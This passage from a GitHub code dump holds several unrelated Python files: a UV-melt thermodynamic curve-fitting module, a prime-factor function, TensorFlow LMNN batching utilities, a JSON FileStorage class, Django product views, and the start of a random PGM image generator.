out\r\n\r\n\r\n### Use the d_absorbance method ###\r\ndef fit_Tm_d_absorbance(curve, celsius_min=5, celsius_max=95, whatever=False):\r\n \"\"\"\r\n For a first pass before direct fit. 
Only fits Tm because fmax and fmin are unknown.\r\n    \"\"\"\r\n    # == Calculate d_p_unfold ==\r\n    curve_used = curve.query(f'celsius >= {celsius_min} & celsius <= {celsius_max}').sort_values(by='celsius')\r\n    acorr_2diff = get_2nd_diff_autocorrelation(curve_used.absorbance)\r\n\r\n    if (not whatever) and (curve_used.absorbance.isnull().values.any() or np.max(np.abs(acorr_2diff)) > 0.005):\r\n        # run away fast\r\n        # if has bad values or jumps (intervention) in the series\r\n        return dict(is_usable=False, Tm=np.nan)\r\n    \r\n    # Upsampled 10x\r\n    x = np.arange(curve_used.celsius.iloc[0], curve_used.celsius.iloc[-1], 0.1)\r\n    signal_used = signal.savgol_filter(curve_used.absorbance, 9, 3, mode='nearest')\r\n    f = interp1d(curve_used.celsius, \r\n                 signal_used, \r\n                 kind='cubic')\r\n    # dx/dT = dx/0.1, where dT = 0.1 from upsampling\r\n    d_p_unfold = np.diff(f(x)) * 10\r\n    d_p_unfold = signal.savgol_filter(d_p_unfold, 99, 3)\r\n    \r\n    # == Find a reasonable range to use ==\r\n    is_usable = True\r\n    d_p_sign = np.sign(d_p_unfold)\r\n    # tag BAD if more than a certain part of the curve is decreasing\r\n    if np.count_nonzero(d_p_sign == -1) > 0.2 * len(d_p_unfold):\r\n        is_usable = False\r\n    \r\n    # common problem: decreasing at high temperature\r\n    # solution: overwrite celsius_max when it first starts to decrease monotonically\r\n    # doesn't affect\r\n    win_len = 15 # 1.5 °C\r\n    local_sum = np.convolve(d_p_sign, np.ones(win_len), 'valid')\r\n    # if not found, celsius_max_idx will be 0\r\n    celsius_max_idx = np.argmax(local_sum <= win_len + 1)\r\n    celsius_min_idx = np.argmax(local_sum >= win_len - 1)\r\n    if celsius_max_idx > 0:\r\n        celsius_max = x[celsius_max_idx]\r\n    if celsius_min_idx > 0:\r\n        celsius_min = x[celsius_min_idx]\r\n    \r\n    # == Call peaks ==\r\n    peaks = signal.find_peaks(d_p_unfold)[0]\r\n    try:\r\n        ind_max = np.argmax(d_p_unfold[peaks])\r\n        Tm = x[peaks[ind_max]]\r\n    except:\r\n        Tm = np.nan\r\n    \r\n    if whatever:\r\n        is_usable = True\r\n    \r\n    result_dict = dict(Tm=Tm, is_usable=is_usable, celsius_min=celsius_min, celsius_max=celsius_max)\r\n    return result_dict\r\n\r\ndef fit_param_d_absorbance(curve, out, celsius_min=5, celsius_max=95, smooth=True, plot_title=''):\r\n    \"\"\"\r\n    Deprecated. 
Other parameters than Tm are not very reliable from this method.\r\n \"\"\"\r\n curve_used = curve.query(f'celsius >= {celsius_min} & celsius <= {celsius_max}').sort_values(by='celsius')\r\n x = np.arange(curve_used.celsius.iloc[0], curve_used.celsius.iloc[-1], 0.1)\r\n signal_used = signal.savgol_filter(curve_used.absorbance, 9, 3, mode='nearest')\r\n signal_used = (signal_used - out.params['fmin'] - out.params['slope'] * curve_used.celsius.values) / (out.params['fmax'] - out.params['fmin'])\r\n f = interp1d(curve_used.celsius, \r\n signal_used, \r\n kind='cubic')\r\n d_p_unfold = np.diff(f(x)) * 10\r\n if smooth:\r\n d_p_unfold = signal.savgol_filter(d_p_unfold, 99, 3)\r\n peaks = signal.find_peaks(d_p_unfold)[0]\r\n ind_max = np.argmax(d_p_unfold[peaks])\r\n peak = peaks[ind_max]\r\n \r\n fig, ax = plt.subplots(figsize=(4,3))\r\n ax.plot(x[:-1], d_p_unfold, 'k')\r\n ax.axvline(x=x[peak], ls='--', c='gray')\r\n ax.set_xlabel('temperature (°C)')\r\n ax.set_ylabel(r\"$p_{unfold}'$\")\r\n ax.set_title(plot_title)\r\n sns.despine()\r\n \r\n result = {}\r\n result['Tm_diff'] = x[peak]\r\n result['dH_diff'] = - d_p_unfold[peak] * 4 * 0.0019872 * (result['Tm_diff'] + 273.15)**2\r\n result['dS_diff'] = result['dH_diff'] / (result['Tm_diff'] + 273.15)\r\n result['dG_37_diff'] = get_dG(result['dH_diff'], result['Tm_diff'], 37)\r\n result['rmse_diff'] = rmse(curve_model(curve_used.celsius, result['dH_diff'], result['Tm_diff'], out.params['fmin'], out.params['fmax'], out.params['s1'], out.params['s2']),\r\n curve_used.absorbance.values)\r\n \r\n return result\r\n\r\n\r\n### Master Function ###\r\ndef fit_curve(fn, figdir='', verbose=False, debug=False, \r\n blank=None, **kwargs):\r\n def fit():\r\n curve = read_curve(fn)\r\n if isinstance(blank, pd.DataFrame):\r\n curve['absorbance'] -= blank['absorbance']\r\n elif isinstance(blank, float):\r\n curve['absorbance'] -= blank\r\n \r\n # Shift up so all values are positive\r\n curve['absorbance'] = curve['absorbance'] - np.min(curve['absorbance'].values) + 0.01\r\n \r\n # Save the blanked curve to disk\r\n blanked_fn = get_blanked_fn(fn)\r\n curve.to_csv(blanked_fn, index=False, header=False)\r\n \r\n curve_name = parse_curve_name(fn)\r\n if verbose:\r\n print(curve_name['curve_str'])\r\n d_absorbance_result_dict = fit_Tm_d_absorbance(curve, **kwargs)\r\n if not d_absorbance_result_dict['is_usable'] or np.isnan(d_absorbance_result_dict['Tm']):\r\n # give up fast and run away\r\n raise Exception(\"Sorry, curve is too crazy for %s\"%fn)\r\n \r\n Tm = d_absorbance_result_dict['Tm']\r\n kwargs['celsius_max'] = d_absorbance_result_dict['celsius_max']\r\n out = fit_param_direct(curve, Tm=Tm, \r\n plot_title=curve_name['curve_str'], **kwargs)\r\n save_fig(os.path.join(figdir, curve_name['curve_date'], f\"{curve_name['curve_num']}_{curve_name['curve_name']}_direct_fit.png\"))\r\n # result = fit_param_d_absorbance(curve, out, plot_title=curve_name['curve_str'], **kwargs)\r\n # save_fig(os.path.join(figdir, curve_name['curve_date'], f\"{curve_name['curve_num']}_{curve_name['curve_name']}_d_p_unfold.png\"))\r\n result_dict = format_fit_result(out)\r\n result_dict.update(kwargs)\r\n result_dict.update(curve_name)\r\n result_dict['data_file'] = fn\r\n if verbose:\r\n print('\\tDone!')\r\n return result_dict\r\n \r\n if debug:\r\n result_dict = fit()\r\n return result_dict\r\n else:\r\n try:\r\n result_dict = fit()\r\n return result_dict\r\n except:\r\n # print(\"Trouble with\", fn)\r\n return dict()\r\n\r\ndef fit_cd_curve(fn, figdir='', verbose=False, debug=False, 
\r\n **kwargs):\r\n def fit():\r\n curve = pd.read_table(fn, header=None)\r\n curve.columns = ['celsius', 'cd', 'v', 'absorbance']\r\n curve.drop(columns = ['cd', 'v'], inplace=True)\r\n \r\n curve_str = os.path.splitext(os.path.split(fn)[-1])[0]\r\n curve_name = dict(curve_str=curve_str,\r\n curve_name=curve_str.split('-')[1],\r\n seqid=curve_str.split('-')[0])\r\n if verbose:\r\n print(curve_name['curve_str'])\r\n d_absorbance_result_dict = fit_Tm_d_absorbance(curve, whatever=True, **kwargs)\r\n if not d_absorbance_result_dict['is_usable'] or np.isnan(d_absorbance_result_dict['Tm']):\r\n print(d_absorbance_result_dict)\r\n # give up fast and run away\r\n raise Exception(\"Sorry, curve is too crazy for %s\"%fn)\r\n \r\n Tm = d_absorbance_result_dict['Tm']\r\n kwargs['celsius_max'] = d_absorbance_result_dict['celsius_max']\r\n out = fit_param_direct(curve, Tm=Tm, \r\n plot_title=curve_name, **kwargs)\r\n save_fig(os.path.join(figdir, f\"{curve_name['curve_str']}_direct_fit.png\"))\r\n # result = fit_param_d_absorbance(curve, out, plot_title=curve_name['curve_str'], **kwargs)\r\n # save_fig(os.path.join(figdir, curve_name['curve_date'], f\"{curve_name['curve_num']}_{curve_name['curve_name']}_d_p_unfold.png\"))\r\n result_dict = format_fit_result(out)\r\n result_dict.update(kwargs)\r\n result_dict.update(curve_name)\r\n result_dict['data_file'] = fn\r\n if verbose:\r\n print('\\tDone!')\r\n return result_dict\r\n \r\n if debug:\r\n result_dict = fit()\r\n return result_dict\r\n else:\r\n try:\r\n result_dict = fit()\r\n return result_dict\r\n except:\r\n # print(\"Trouble with\", fn)\r\n return dict()\r\n\r\ndef fit_all_cd_curves(datadir):\r\n datafiles = [x for x in os.listdir(datadir) if x.endswith('.txt')]\r\n \r\n result_columns = ['curve_str', 'seqid', 'curve_name', \r\n 'dH', 'dH_std', 'Tm', 'Tm_std', \r\n 'fmax', 'fmax_std', 'fmin', 'fmin_std', \r\n 's1', 's1_std', 's2', 's2_std', 'rmse',\r\n 'celsius_min', 'celsius_max', 'data_file']\r\n result_df = pd.DataFrame(index=np.arange(len(datafiles)), columns=result_columns)\r\n \r\n for i,fn in enumerate(datafiles):\r\n result_dict = fit_cd_curve(os.path.join(datadir,fn), figdir=os.path.join(datadir, 'fig'), \r\n debug=True, verbose=True)\r\n result_df.iloc[i, :] = result_dict\r\n \r\n return result_df.sort_values(by=['seqid', 'curve_name'])\r\n \r\ndef make_empty_result_df(data_list, sample_sheet: pd.DataFrame, blank: bool=False):\r\n #----- make the index and column names for result_df -----\r\n result_index = []\r\n curve_date, curve_num, curve_name, blank_to_list, data_file = [], [], [], [], []\r\n \r\n for fn in data_list:\r\n curve_dict = parse_curve_name(fn)\r\n row = query_curve_in_df(sample_sheet, curve_dict)\r\n if len(row) > 0:\r\n result_index.append(curve_dict['curve_str'])\r\n curve_date.append(curve_dict['curve_date'])\r\n curve_num.append(curve_dict['curve_num'])\r\n curve_name.append(curve_dict['curve_name'])\r\n data_file.append(fn)\r\n if row.Blank.values[0] == 'manual':\r\n blank_to_list.append(find_blank_reference_curve_str(curve_dict['curve_str'], row.BlankTo.values[0]))\r\n else:\r\n blank_to_list.append('no_manual_blank')\r\n elif len(row) == 0:\r\n data_list.remove(fn)\r\n\r\n result_columns = ['curve_date', 'curve_num', 'curve_name',\r\n 'dH', 'dH_std', 'Tm', 'Tm_std', \r\n 'fmax', 'fmax_std', 'fmin', 'fmin_std', \r\n 's1', 's1_std', 's2', 's2_std', 'rmse',\r\n 'celsius_min', 'celsius_max', 'data_file']\r\n\r\n result_df = pd.DataFrame(index=result_index, columns=result_columns)\r\n result_df.curve_date = 
np.array(curve_date, dtype=str)\r\n    result_df.curve_num = np.array(curve_num, dtype=str)\r\n    result_df.curve_name = curve_name\r\n    result_df.data_file = data_file\r\n\r\n    if blank:\r\n        result_df['blank'] = blank_to_list\r\n        \r\n    return result_df\r\n    \r\n\r\n### Fit from sample_sheet ###\r\ndef fit_all_manual_blank(datadir:str, sample_sheet_file:str, result_file:str='uvmelt.csv',\r\n                         qc_criterion = 'rmse < 0.015 & dH_std < 10 & Tm_std < 5'):\r\n    \"\"\"\r\n    This function blanks all the curves first before fitting.\r\n    If not manual blank or cannot find blank, use the original curve.\r\n    Reads and caches all blank data at once first.\r\n    \"\"\"\r\n\r\n    #----- Read files -----\r\n    sample_sheet = read_sample_sheet(sample_sheet_file)#.query(\"Blank == 'manual'\")\r\n    data_list = [fn for fn in absolute_file_paths(datadir) if (fn.endswith('.csv') and (not fn.endswith('_blanked.csv')))]\r\n    \r\n    #----- make the index and column names for result_df -----\r\n    result_df = make_empty_result_df(data_list, sample_sheet, blank=True)\r\n    \r\n    #----- read blank curves -----\r\n    all_blanks = np.unique(result_df['blank'])\r\n    blank_dict = dict()\r\n    for blank_str in all_blanks:\r\n        if not blank_str in result_df.index:\r\n            # check the blanks are in the dataset\r\n            print( \"blank data %s not in the dataset!\" % blank_str )\r\n            blank_dict[blank_str] = 0\r\n        else:\r\n            blank_fn = data_list[result_df.index.to_list().index(blank_str)]\r\n            blank_dict[blank_str] = read_curve(blank_fn)\r\n            # QC blank curve\r\n            if not qc_blank_curve(blank_dict[blank_str]):\r\n                blank_dict[blank_str] = np.nan # throw affected curves away\r\n    \r\n    #----- fit curves -----\r\n    for fn in tqdm(data_list):\r\n        curve_name = parse_curve_name(fn)\r\n        row = query_curve_in_df(sample_sheet, curve_name)\r\n\r\n        if len(row) == 0 or (curve_name['curve_str'] in all_blanks) or (not row['Usable'].values[0]):\r\n            continue\r\n        else:\r\n            try:\r\n                blank_curve = blank_dict[result_df.loc[curve_name['curve_str'], 'blank']]\r\n            except:\r\n                blank_curve = 0\r\n            \r\n            result_dict = fit_curve(fn, figdir=os.path.join(datadir,'fig'), \r\n                                    blank=blank_curve,\r\n                                    debug=False,\r\n                                    celsius_min=row.at[row.index[0],'celsius_min'],\r\n                                    celsius_max=row.at[row.index[0],'celsius_max'])\r\n            result_df.loc[curve_name['curve_str'], :] = result_dict\r\n    \r\n    result_df.dropna(subset=['dH', 'Tm', 'rmse'], inplace=True)\r\n    \r\n    result_df['pass_qc'] = result_df.eval(qc_criterion)\r\n    \r\n    result_df['SEQID'] = ''\r\n    for col in ['SEQID', 'conc_uM', 'Na_mM', 'celsius_min', 'celsius_max', 'Cuvette']:\r\n        result_df[col] = lookup_sample_df(result_df, sample_sheet, col)\r\n    \r\n    result_df['dG_37'] = get_dG(result_df['dH'], result_df['Tm'], celsius=37)\r\n    result_df['dS'] = result_df['dH'] / (result_df['Tm'] + 273.15)\r\n    result_df.to_csv(result_file)\r\n    \r\n    return result_df\r\n    \r\n    \r\n\r\ndef fit_all_no_blank(datadir:str, sample_sheet_file:str, result_file:str='uvmelt.csv'):\r\n    #----- Hardcoded QC -----\r\n    qc_criterion = 'rmse < 0.015 & dH_std < 10 & Tm_std < 5'\r\n    \r\n    #----- Read files -----\r\n    sample_sheet = read_sample_sheet(sample_sheet_file).query(\"Blank != 'manual'\")\r\n    data_list = [fn for fn in absolute_file_paths(datadir) if fn.endswith('.csv')]\r\n    \r\n    #----- make the index and column names for result_df -----\r\n    result_df = make_empty_result_df(data_list, sample_sheet)\r\n\r\n    #----- fit curves -----\r\n    for fn in tqdm(data_list):\r\n        curve_name = parse_curve_name(fn)\r\n        row = query_curve_in_df(sample_sheet, curve_name)\r\n\r\n        if len(row) == 0:\r\n            print(fn)\r\n            
continue\r\n else:\r\n result_dict = fit_curve(fn, figdir=os.path.join(datadir,'fig'), \r\n celsius_min=row.at[row.index[0],'celsius_min'],\r\n celsius_max=row.at[row.index[0],'celsius_max'])\r\n\r\n result_df.loc[curve_name['curve_str'], :] = result_dict\r\n \r\n result_df.dropna(inplace=True)\r\n \r\n result_df['pass_qc'] = result_df.eval(qc_criterion)\r\n \r\n for col in ['SEQID', 'conc_uM', 'Na_mM', 'celsius_min', 'celsius_max']:\r\n result_df[col] = lookup_sample_df(result_df, sample_sheet, col)\r\n \r\n result_df['dG_37'] = get_dG(result_df['dH'], result_df['Tm'], celsius=37)\r\n result_df['dS'] = result_df['dH'] / (result_df['Tm'] + 273.15)\r\n result_df['isCooling'] = result_df.curve_name.apply(lambda x: 'Cooling' in x)\r\n result_df.to_csv(result_file)\r\n \r\n #----- Plot QC -----\r\n fig, ax = plt.subplots(1, 2, figsize=(8,4))\r\n sns.scatterplot(data=result_df, \r\n x='rmse', y='Tm_std', color='gray',\r\n ax=ax[0])\r\n sns.scatterplot(data=result_df.query(qc_criterion), \r\n x='rmse', y='Tm_std', color='salmon',\r\n ax=ax[0])\r\n ax[0].axhline(5, linestyle='--', c='gray')\r\n ax[0].axvline(0.015, linestyle='--', c='gray')\r\n ax[1].set_ylim([0, 100])\r\n\r\n sns.scatterplot(data=result_df, \r\n x='rmse', y='dH_std', color='gray',\r\n ax=ax[1])\r\n sns.scatterplot(data=result_df.query(qc_criterion), \r\n x='rmse', y='dH_std', color='salmon',\r\n ax=ax[1])\r\n ax[1].set_ylim([-5, 100])\r\n ax[1].axvline(0.015, linestyle='--', c='gray')\r\n ax[1].axhline(10, linestyle='--', c='gray')\r\n sns.despine()\r\n\r\n plt.suptitle('%.2f%% (%d / %d) passed QC' % (100 * result_df.eval(qc_criterion).sum() / len(result_df), result_df.eval(qc_criterion).sum(), len(result_df)))\r\n save_fig(os.path.join(datadir, 'fig', 'QC.pdf'), fig)\r\n plt.show()\r\n \r\n return result_df\r\n \r\ndef fit_all(datadir:str, sample_sheet_file:str, result_file:str='uvmelt.csv'):\r\n # noblank_result_df = fit_all_no_blank(datadir, sample_sheet_file, result_file.replace(\".csv\", \"_no_blank.csv\"))\r\n blank_result_df = fit_all_manual_blank(datadir, sample_sheet_file, result_file.replace(\".csv\", \"_manual_blank.csv\"))\r\n return blank_result_df\r\n \r\n###### Aggregate the results in each sample #####\r\ndef agg_fit_result(uvmelt_result_file, agg_result_file, sample_sheet_file,\r\n single_curve_qc_criteria=None,\r\n Tm_std_thresh=0.5, dH_std_thresh=1.5, clean=True, only_use_cooling=False):\r\n \"\"\"\r\n Aggregates multiple heat-cool cycles for a given cuvette, e.g. 
sample level\r\n    Not aggregated to sequence level!\r\n    \"\"\"\r\n    uv = lambda x: processing.get_combined_param_bt(x, result_df.loc[x.index, x.name+'_std'])['p']\r\n    uv_std = lambda x: processing.get_combined_param_bt(x, result_df.loc[x.index, x.name+'_std'])['e']\r\n    \r\n    if single_curve_qc_criteria is None:\r\n        result_df = pd.read_csv(uvmelt_result_file, index_col=0).query('pass_qc')\r\n    else:\r\n        result_df = pd.read_csv(uvmelt_result_file, index_col=0)\r\n        result_df['pass_qc'] = result_df.eval(single_curve_qc_criteria)\r\n        result_df = result_df.query('pass_qc')\r\n        sns.scatterplot(data=result_df.query('dH_std < 1e2 & Tm_std < 50 & dH < 0'), x='dH_std', y='Tm_std', hue='pass_qc')\r\n    \r\n    if only_use_cooling:\r\n        result_df['isCooling'] = result_df.curve_name.apply(lambda x: 'Cooling' in x)\r\n        result_df = result_df.query('isCooling')\r\n    \r\n    try:\r\n        agg_stat = [uv, uv_std, len]\r\n        result_agg_df = result_df.groupby(['SEQID', 'curve_date', 'curve_num']).agg(dict(dH=agg_stat, Tm=agg_stat)).reset_index()\r\n        result_agg_df.columns = [f'{x[0]}_{x[1]}'.strip('_').replace('<lambda_0>', 'uv').replace('<lambda_1>', 'uv_std') for x in result_agg_df.columns]\r\n    except:\r\n        agg_stat = [np.median, np.std, len]\r\n        result_agg_df = result_df.groupby(['SEQID', 'curve_date', 'curve_num']).agg(dict(dH=agg_stat, Tm=agg_stat)).reset_index()\r\n        result_agg_df.columns = [f'{x[0]}_{x[1]}'.strip('_').replace('median', 'uv').replace('std', 'uv_std') for x in result_agg_df.columns]\r\n\r\n    result_agg_df = result_agg_df.fillna(0)\r\n    result_agg_df.rename(columns=dict(dH_len='n_curve'), inplace=True)\r\n    result_agg_df.drop(columns='Tm_len', inplace=True)\r\n\r\n    result_agg_df['dG_37_uv'] = get_dG(dH=result_agg_df.dH_uv, Tm=result_agg_df.Tm_uv, celsius=37)\r\n    result_agg_df['dG_37_uv_std'] = get_dG_err(result_agg_df.dH_uv, result_agg_df.dH_uv_std, \r\n                                               result_agg_df.Tm_uv, result_agg_df.Tm_uv_std,\r\n                                               celsius=37)\r\n    result_agg_df['dS_uv'] = get_dS(dH=result_agg_df.dH_uv, Tm=result_agg_df.Tm_uv)\r\n    result_agg_df['dS_uv_std'] = get_dS_err(result_agg_df.dH_uv, result_agg_df.dH_uv_std, \r\n                                            result_agg_df.Tm_uv, result_agg_df.Tm_uv_std)\r\n    \r\n    #TODO\r\n    result_agg_df['is_hairpin'] = result_agg_df.SEQID.apply(lambda x: False if ('_' in x) or x.startswith('D') else True)\r\n    result_agg_df['SEQID'] = result_agg_df.SEQID.apply(lambda x: x.split('_')[0] if '_' in x else x)\r\n    \r\n    sample_sheet = read_sample_sheet(sample_sheet_file)\r\n    for col in ['Na_mM', 'conc_uM', 'Purification']:\r\n        result_agg_df[col] = lookup_sample_df(result_agg_df, sample_sheet, col)\r\n    \r\n    qc_criterion = 'Tm_uv_std < %f & dH_uv_std < %f' % (Tm_std_thresh, dH_std_thresh)\r\n    fig, ax = plt.subplots(1, 2, figsize=(8,4))\r\n    sns.scatterplot(data=result_agg_df,\r\n                    x='dH_uv_std', y='Tm_uv_std', hue='n_curve',\r\n                    palette='plasma', ax=ax[0])\r\n    ax[0].axhline(Tm_std_thresh, linestyle='--', c='gray')\r\n    ax[0].axvline(dH_std_thresh, linestyle='--', c='gray')\r\n    ax[0].set_title('%.2f%% (%d / %d) variants passed QC' % \r\n                    (100 * result_agg_df.eval(qc_criterion).sum() / len(result_agg_df), result_agg_df.eval(qc_criterion).sum(), len(result_agg_df)))\r\n    sns.scatterplot(data=result_df.query('dH_std < 1e2 & Tm_std <20'), x='dH_std', y='Tm_std', hue='rmse', ax=ax[1])\r\n    ax[1].set_title('single curves used')\r\n    sns.despine()\r\n    save_fig(agg_result_file.replace('.csv', '.pdf'), fig)\r\n    \r\n    if clean:\r\n        result_agg_df = result_agg_df.query(qc_criterion)\r\n    else:\r\n        result_agg_df['pass_qc'] = result_agg_df.eval(qc_criterion)\r\n    \r\n    
result_agg_df.to_csv(agg_result_file)\r\n    \r\n    return result_agg_df\r\n    \r\n    \r\n###### Adjust systematic offset ######\r\ndef prep_x_y_yerr(df, param, adjusted=True):\r\n    if adjusted:\r\n        x_suffix = '_adjusted'\r\n    else:\r\n        x_suffix = ''\r\n    \r\n    x = df[param+x_suffix].values.reshape(-1,1)\r\n    y = df[param+'_uv'].values.reshape(-1,1)\r\n    yerr = df[param+'_uv_std'].values.reshape(-1,1)\r\n    yerr[yerr==0] = np.median(yerr)\r\n    return add_intercept(x), y, yerr\r\n\r\ndef fit_param_offset(df, param, fix_slope=False, adjusted=True):\r\n    x, y, yerr = prep_x_y_yerr(df, param, adjusted)\r\n    ols = LinearRegressionSVD(param=param)\r\n    if fix_slope:\r\n        ols.coef_ = np.array([1.0, 0.0])\r\n        ols.fit_intercept_only(x, y)\r\n    else:\r\n        ols.fit(x, y, yerr)\r\n    return ols\r\n    \r\ndef correct_param(df, correction_dict, param:str):\r\n    \"\"\"\r\n    x - your data\r\n    \"\"\"\r\n    x = add_intercept(df[param].values.reshape(-1,1))\r\n    return x @ correction_dict[param].reshape(2,1)","repo_name":"keyuxi/nnn_paper","sub_path":"nnn/uv.py","file_name":"uv.py","file_ext":"py","file_size_in_byte":32369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29919880677","text":"\ndef prime_factors(num):\n    tst = [x for x in reversed(range(1,num))]\n    pf =[]\n    x = 0\n    while (x < len(tst)):\n        if (num%tst[x] == 0 and isprime(tst[x])and tst[x] != 1):\n            pf.append(tst[x])\n            num /= tst[x]\n        else:\n            x +=1\n    pf.reverse()\n    return pf\n    \ndef isprime(num):\n    if (num == 2):\n        return True\n    return not any([num%x == 0 for x in range(2,num)])\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"8vBvgJMc2uQJpD6d7_13.py","file_name":"8vBvgJMc2uQJpD6d7_13.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33594517696","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Dec 12 11:23:37 2017\r\n\r\n@author: nsde\r\n\"\"\"\r\n\r\nimport tensorflow as tf\r\nimport os, sys\r\nimport numpy as np\r\n\r\n#%%\r\nclass lmnn_batch_builder():\r\n    def __init__(self, X, y, tN, imp, k, batch_size, shuffel=True):\r\n        # Data\r\n        self.X = X\r\n        self.y = y\r\n        \r\n        # Append imposters to target neighbour structure\r\n        imp_r = imp[:,1].repeat(k) # repeat the imposters\r\n        imp_r = imp_r.reshape((-1,k,k)).transpose((0,2,1)).reshape((-1,k))\r\n        self.combined = np.hstack((tN, imp_r))\r\n        \r\n        # Shuffle\r\n        if shuffel:\r\n            self.combined = np.random.permutation(self.combined)\r\n        \r\n        # Constants\r\n        self.batch_size = batch_size\r\n        self.counter = 0\r\n        self.n = tN.shape[0]\r\n        \r\n    def __next__(self):\r\n        batch_idx = self.combined[self.counter:self.counter+self.batch_size]\r\n        self.counter += self.batch_size\r\n        idx, inv_idx = np.unique(batch_idx, return_inverse=True)\r\n        inv_idx = np.reshape(inv_idx, (-1, 5))[:,:2]\r\n        return self.X[idx], self.y[idx], inv_idx\r\n    \r\n    def __iter__(self):\r\n        while self.counter < self.n:\r\n            batch_idx = self.combined[self.counter:self.counter+self.batch_size]\r\n            self.counter += self.batch_size\r\n            idx, inv_idx = np.unique(batch_idx, return_inverse=True)\r\n            inv_idx = np.reshape(inv_idx, (-1, 5))[:,:2]\r\n            yield self.X[idx], self.y[idx], inv_idx\r\n    \r\n    def __len__(self):\r\n        return int(np.ceil(self.n / self.batch_size))\r\n\r\n#%%\r\nclass batchifier():\r\n    ''' Small iterator that will cut the input data into smaller batches. 
Can\r\n        then be used in a for-loop like:\r\n            for x_batch in batchifier(X, 100):\r\n                # x_batch.shape[0] = 100 \r\n    '''\r\n    \r\n    def __init__(self, data, batch_size):\r\n        self.data = data\r\n        self.batch_size = batch_size    \r\n        self.counter = 0\r\n        self.N = self.data.shape[0]\r\n        \r\n    def __iter__(self):\r\n        while self.counter < self.N:\r\n            yield self.data[self.counter:self.counter+self.batch_size]\r\n            self.counter += self.batch_size\r\n\r\n    def __len__(self):\r\n        return int(np.ceil(self.data.shape[0] / self.batch_size))\r\n\r\n#%%\r\ndef get_dir(file):\r\n    \"\"\" Get the folder of specified file \"\"\"\r\n    return os.path.dirname(os.path.realpath(file))\r\n\r\n#%%\r\ndef create_dir(direc):\r\n    \"\"\" Create a dir if it does not already exist \"\"\"\r\n    if not os.path.exists(direc):\r\n        os.mkdir(direc)\r\n\r\n#%%\r\ndef colorise(string, color='green'):\r\n    if color=='green': col='0;32;40m'\r\n    elif color=='blue': col='0;34;40m'\r\n    elif color=='red': col='0;31;40m'\r\n    begin = '\\x1b['\r\n    end = '\\033[0m'\r\n    return begin + col + string + end\r\n\r\n#%%\r\ndef progressBar(value, endvalue, name = 'Process', bar_length=20):\r\n    percent = float(value) / endvalue\r\n    arrow = '-' * int(round(percent * bar_length)-1) + '>'\r\n    spaces = ' ' * (bar_length - len(arrow))\r\n\r\n    sys.stdout.write(\"\\r{0}: [{1}] {2}%\".format(name, arrow + spaces, int(round(percent * 100))))\r\n    sys.stdout.flush()\r\n    \r\n#%%\r\ndef get_optimizer(name):\r\n    ''' Returns a tensorflow optimizer based on name '''\r\n    optimizer = {'adam': tf.train.AdamOptimizer,\r\n                 'sgd': tf.train.GradientDescentOptimizer,\r\n                 'momentum': tf.train.MomentumOptimizer}\r\n    try:\r\n        opt = optimizer[name]\r\n        return opt\r\n    except KeyError:\r\n        raise Exception(name + ' is an invalid option to input optimizer, please'\r\n                        + ' choose between: ' + ', '.join(optimizer.keys()))\r\n\r\n#%%\r\ndef adjust_learning_rate(alpha, loss_new, loss_old):\r\n    ''' Function for adjusting the learning rate while training '''\r\n    out_alpha = alpha*1.01 if loss_new <= loss_old else alpha*0.5\r\n    return out_alpha\r\n\r\n#%%\r\nif __name__ == '__main__':\r\n    print(get_dir(__file__))","repo_name":"SkafteNicki/Deep_LMNN","sub_path":"dlmnn/helper/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7001457280","text":"#!/usr/bin/python3\n\"\"\" FileStorage class \"\"\"\n\n\nfrom os.path import exists\nimport json\nfrom models.base_model import BaseModel\n\n\nclass FileStorage:\n    \"\"\" FileStorage class \"\"\"\n\n    __file_path = \"file.json\"\n    __objects = {}\n\n    def all(self):\n        \"\"\" returns the dictionary objects \"\"\"\n        return self.__objects\n\n    def new(self, obj):\n        \"\"\" sets in objects the obj with key <obj class name>.id \"\"\"\n\n        key = \"{}.{}\".format(obj.__class__.__name__, obj.id)\n        self.__objects[key] = obj\n        self.save()\n\n    def save(self):\n        \"\"\" serializes objects to the JSON file \"\"\"\n        dicts = {}\n        for key, value in self.__objects.items():\n            dicts[key] = value.to_dict()\n        with open(self.__file_path, 'w') as f:\n            json.dump(dicts, f)\n\n    def reload(self):\n        \"\"\" deserializes the JSON file to objects \"\"\"\n        if exists(self.__file_path):\n            with open(self.__file_path, 'r') as f:\n                dicts = json.load(f)\n                for key, value in dicts.items():\n                    self.__objects[key] = BaseModel(**value)\n        else:\n            
pass\n","repo_name":"IsmaelMolina-code/holbertonschool-AirBnB_clone","sub_path":"models/engine/file_storage.py","file_name":"file_storage.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15382545108","text":"from django.shortcuts import render, get_object_or_404\nfrom .models import Product\nfrom django.http import Http404\nfrom django.db.models import Avg, Min, Max\n\n\n# Create your views here.\n\ndef product_list(request):\n products = Product.objects.all().order_by('-rating')\n number_of_products = products.count()\n average = products.aggregate(Avg('rating'))\n return render(request, 'product_module/product_list.html', {\n 'products': products,\n 'total_number_of_product':number_of_products,\n 'average_ratings': average,\n })\n\n\n\ndef product_detail(request, slug):\n # try:\n # product = Product.objects.get(id=product_id)\n # except:\n # raise Http404()\n product = get_object_or_404(Product, slug=slug)\n return render(request, 'product_module/product_detail.html', {\n 'product': product\n })\n","repo_name":"Khodaprst/GitHub","sub_path":"eshop_project/product_module/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"13969098057","text":"import random\nim = open('Image/dos.pgm','w')\nim.write('P2\\n')\nim.write('# Hugo Araya Carrasco\\n')\nim.write('512 512\\n')\nim.write('255\\n')\nimagen = ''\nfor i in range(512*512):\n numero = random.randint(0,255)\n imagen = imagen + str(numero)+' 